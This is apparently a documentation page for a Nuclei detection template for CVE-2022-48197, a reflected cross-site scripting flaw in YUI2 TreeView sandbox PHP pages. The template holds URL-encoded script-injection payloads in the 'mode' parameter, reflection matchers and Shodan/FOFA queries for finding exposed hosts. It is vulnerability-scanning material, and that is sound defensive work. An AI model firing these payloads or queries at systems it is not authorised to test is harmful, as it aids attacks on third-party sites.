Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting
ID: CVE-2022-48197
Severity: medium
Author: ctflearner
Tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project
Description
Section titled “Description”Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.
YAML Source
Section titled “YAML Source”id: CVE-2022-48197
info: name: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting author: ctflearner severity: medium description: | Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/51198 - https://packetstormsecurity.com/files/171633/Yahoo-User-Interface-TreeView-2.8.2-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2022-48197 - http://packetstormsecurity.com/files/171633/Yahoo-User-Interface-TreeView-2.8.2-Cross-Site-Scripting.html - https://github.com/ryan412/CVE-2022-48197/blob/main/README.md classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-48197 cwe-id: CWE-79 epss-score: 0.00421 epss-percentile: 0.74161 cpe: cpe:2.3:a:yui_project:yui:*:*:*:*:*:*:*:* metadata: verified: true max-request: 9 vendor: yui_project product: yui shodan-query: - html:"bower_components/yui2/" - http.html:"bower_components/yui2/" fofa-query: body="bower_components/yui2/" tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project
http: - method: GET path: - "{{BaseURL}}{{paths}}" payloads: paths: - "/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
stop-at-first-match: true
matchers-condition: and matchers: - type: word part: body words: - "1'\"()&%<zzz><script>alert(document.domain)</script>" - "widget.TreeView" condition: and
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a00473045022012b25e7ea73f57ab97ec8369476b26bd2884406b57743ee6289eeeef52c5e124022100d39a718c0eab6908a6d8cbb894d09d832ac9a3e81b9d4bdae0eef7525b9603f9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-48197.yaml"